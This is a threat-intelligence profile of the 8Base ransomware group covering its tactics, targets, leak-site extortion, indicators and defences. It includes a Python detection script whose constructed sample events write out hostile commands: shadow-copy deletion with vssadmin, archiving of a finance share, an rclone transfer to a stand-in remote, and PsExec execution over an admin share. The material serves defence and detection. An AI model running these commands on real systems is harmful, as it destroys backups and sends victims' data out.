8Base Ransomware Group – Threat Actor Profile

1. Overview

8Base is a rapidly emerging double extortion ransomware group that rose to prominence in mid-2023, following a dramatic surge in victim disclosures and leak site activity. The group has attracted attention for its visually distinctive leak site, aggressive extortion messaging, and strategic reuse of code and infrastructure from other ransomware families—most notably Phobos and RansomHouse.

Despite its relatively recent rise, 8Base has already claimed dozens of victims across multiple sectors, including professional services, construction, legal, manufacturing, logistics, and financial services. Its operations appear opportunistic, focusing on small and mid-sized enterprises (SMEs) with vulnerable perimeter services or poor internal segmentation.


2. Origin and Evolution

The first confirmed 8Base incidents were observed in early 2023, though some infrastructure and payload indicators suggest earlier testing campaigns in 2022. The group’s malware shares numerous similarities with Phobos ransomware, suggesting either a forked version of the code or close collaboration with former Phobos operators.

8Base has been highly active on its dark web leak site, publishing victim data in rapid succession throughout 2023 and into 2024. It operates a closed ransomware model, meaning there is no known affiliate programme, and all campaigns appear to be run by a central team or tightly controlled group of operators.


3. Tactics, Techniques, and Procedures (TTPs)

8Base’s attack patterns reflect classic double extortion methodology, but with rapid operational tempo and minimal lateral movement:

  • Initial Access:
    Via exposed RDP, VPNs without MFA, and email phishing with malicious attachments or macro-laden documents (T1566.001, T1078, T1190).
  • Privilege Escalation & Lateral Movement:
    Limited evidence of advanced movement. Often relies on stolen credentials and deployment from a single compromised endpoint. Occasional use of PsExec and RDP (T1021).
  • Data Exfiltration:
    Uses WinSCP, Rclone, and simple batch scripts to compress and exfiltrate high-value data to attacker-controlled storage (T1041).
  • Encryption:
    Payloads written in C/C++, believed to be derived from Phobos code. Encrypts user and network drives with extensions such as .8base, .crimson, or .lock. Ransom notes include contact instructions over encrypted messaging platforms like Tox or email.
  • Evasion & Persistence:
    Uses LOLBins (T1218), disables antivirus and logging tools, and deletes shadow copies via vssadmin or PowerShell (T1490).

4. Targeting Profile

8Base targets a broad range of organisations, typically selected based on ease of access and data value rather than sector alignment. Confirmed targeting includes:

  • Construction and engineering firms
  • Professional services and consultancies
  • Legal practices and accountancy firms
  • Regional logistics and transport companies
  • SMEs with exposed RDP or misconfigured firewall rules

UK-based companies—especially in legal and construction sectors—have been named on 8Base’s leak site, suggesting an increased focus on under-defended mid-sized businesses.


5. Notable Campaigns and Victims

While not as globally prominent as LockBit or Cl0p, 8Base has demonstrated a growing reach and disruptive impact. Publicly named victims include:

  • A UK regional legal services provider, with internal case files and HR data leaked.
  • A German manufacturing SME, where operational and CAD data were exfiltrated.
  • A US construction firm, with financial records and architectural diagrams exposed.

Victims are typically listed on the 8Base leak portal with:

  • Organisation name and logo
  • Sector classification
  • File samples for download
  • Countdown timers to full leak

6. Ransomware and Leak Site Behaviour

8Base runs a distinctive and well-branded leak site that mimics corporate design—complete with “About Us” and “Mission” statements. Their extortion tactics are forceful and include:

  1. Immediate publication of partial data to prove breach
  2. Warnings of full disclosure to the press or competitors
  3. Contact instructions via Tox, email, or chat portals
  4. Countdown clocks to full dataset release if negotiations stall

Ransom demands vary widely but typically range between £50,000 and £500,000, depending on victim size and data value.


7. Technical Indicators

Common IOCs and traits of 8Base include:

  • File extensions: .8base, .crimson, .lock
  • Ransom notes: info.txt, read_me.txt, or Restore-Your-Files.txt
  • Use of rclone.exe, 7z.exe, and WinSCP.exe for compression and exfiltration
  • Admin share abuse via net use and PsExec
  • Exfiltration destinations hosted in Eastern Europe

UK Cyber Defence Ltd maintains updated IOC packs and detection rules for subscribers.
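As an added illustration (not part of the original profile and not the detection rules UK Cyber Defence Ltd distributes to subscribers), the Python script below applies the TTPs from section 3 and the indicators from section 7 to a handful of constructed host events. The pipe-separated event format, host names, user names, file paths and command lines are invented for the example, and the regular expressions are assumptions mapped to the traits listed above; the `Win32_ShadowCopy` string is included as the usual PowerShell/WMI route to the same T1490 outcome.

```python
"""
Host-event triage against the 8Base traits in this profile.

Added example, not vendor code. Event format, hosts, users and paths below are
constructed; the rule regexes are assumptions mapped to the TTPs/IOCs above.
"""
import re
from collections import defaultdict

# Constructed telemetry. One event per line: kind|host|user|image|detail
# ("proc": detail = command line; "file": detail = created file path).
SAMPLE_EVENTS = r"""
proc|WS-014|CORP\j.smith|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
proc|WS-014|CORP\j.smith|C:\Users\Public\7z.exe|7z.exe a -p -mhe=on C:\Users\Public\fin.7z \\FS01\Finance
proc|WS-014|CORP\j.smith|C:\Users\Public\rclone.exe|rclone.exe copy C:\Users\Public\fin.7z remote:drop --transfers 8
proc|WS-014|CORP\j.smith|C:\Windows\System32\net.exe|net use \\FS01\C$ /user:CORP\svc_backup
proc|WS-014|CORP\j.smith|C:\Tools\PsExec.exe|PsExec.exe \\FS01 -s cmd /c C:\Users\Public\run.bat
file|FS01|CORP\svc_backup|-|C:\Shares\Finance\Q3-ledger.xlsx.8base
file|FS01|CORP\svc_backup|-|C:\Shares\Finance\info.txt
proc|WS-022|CORP\a.jones|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\a.jones\notes.txt
file|WS-022|CORP\a.jones|-|C:\Users\a.jones\Documents\lock_screen.png
"""

# (signal name, ATT&CK technique cited in the profile, event kind, pattern)
RULES = [
    # Shadow copy deletion via vssadmin or the PowerShell WMI route (T1490)
    ("shadow_copy_deletion", "T1490", "proc",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|win32_shadowcopy", re.I)),
    # Compression / exfiltration tooling named in section 7 (T1041)
    ("exfil_tooling", "T1041", "proc",
     re.compile(r"(^|\\|\s)(rclone|7z|winscp)\.exe\b", re.I)),
    # Admin share mapping with net use, or PsExec remote execution (T1021)
    ("admin_share_or_psexec", "T1021", "proc",
     re.compile(r"net(\.exe)?\s+use\s+\\\\\S+\\(c|admin)\$|psexec(\.exe)?\b", re.I)),
    # Encrypted-file extensions and ransom note names from section 7
    ("ransom_artifact", "encryption", "file",
     re.compile(r"\.(8base|crimson|lock)$|\\(info|read_me|restore-your-files)\.txt$", re.I)),
]


def parse_event(line):
    kind, host, user, image, detail = line.split("|", 4)
    return {"kind": kind, "host": host, "user": user, "image": image, "detail": detail}


def match_rules(event):
    """Return (signal, technique) pairs whose pattern matches this event."""
    if event["kind"] == "file":
        subject = event["detail"]
    else:
        subject = f"{event['image']} {event['detail']}"
    return [(name, tech) for name, tech, kind, pat in RULES
            if kind == event["kind"] and pat.search(subject)]


def severity_for(signals):
    """Shadow copy deletion is rarely legitimate, so it escalates on its own;
    otherwise require two distinct signals so a lone 7z run by an admin is
    not treated as an incident."""
    if "shadow_copy_deletion" in signals or len(signals) >= 2:
        return "high"
    return "low"


def triage(log_text):
    """Group rule hits per host and assign a severity to each host."""
    per_host = defaultdict(lambda: {"signals": set(), "events": []})
    for line in log_text.strip().splitlines():
        event = parse_event(line)
        for name, tech in match_rules(event):
            per_host[event["host"]]["signals"].add(name)
            per_host[event["host"]]["events"].append(f"{tech} {name}: {event['detail']}")
    return {host: {"severity": severity_for(d["signals"]),
                   "signals": d["signals"], "events": d["events"]}
            for host, d in per_host.items()}


if __name__ == "__main__":
    for host, finding in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{host}: {finding['severity']} ({', '.join(sorted(finding['signals']))})")
        for entry in finding["events"]:
            print("   ", entry)
```

Two caveats for anyone adapting this: the `.lock` extension is shared with many legitimate lock files, so on its own it only produces a low-severity hit here, and the correlation is per host, so the file server that receives the encrypted files (FS01 in the sample) is reported separately from the workstation that ran the tooling (WS-014); joining the two on the account used (`svc_backup`) is the natural next step.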


8. Defensive Measures and Recommendations

To defend against 8Base ransomware:

  • Close or restrict RDP access, and enforce MFA across all remote services
  • Monitor for anomalous data compression or outbound transfer activity
  • Patch known vulnerabilities in VPNs, file transfer tools, and CMS platforms
  • Deploy EDR/XDR with behavioural detection, focusing on archive creation, PowerShell use, and admin tool abuse
  • Maintain offline backups, tested and secured with access controls
  • Implement data loss prevention (DLP) where appropriate

9. Attribution and Alliances

While no formal attribution has been made, code analysis shows strong links to Phobos, a ransomware strain long associated with Russian-language cybercriminal forums. 8Base may represent either a direct evolution of Phobos, or a closely aligned splinter group.

The group appears to operate independently, with no clear alliances to LockBit, Cl0p, or ALPHV, though it may share infrastructure or access brokers in the broader cybercrime ecosystem.


10. Conclusion

8Base is a fast-moving ransomware operation that exemplifies the modern trend toward streamlined, high-pressure extortion campaigns against lightly defended but data-rich enterprises. Its hybrid use of Phobos-based tooling and modern leak site strategy makes it a significant emerging threat, particularly for UK SMEs in professional and industrial sectors.

As with all double extortion operations, the best defence lies in limiting lateral movement, controlling sensitive data access, and being prepared to respond to both encryption and exposure.


Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025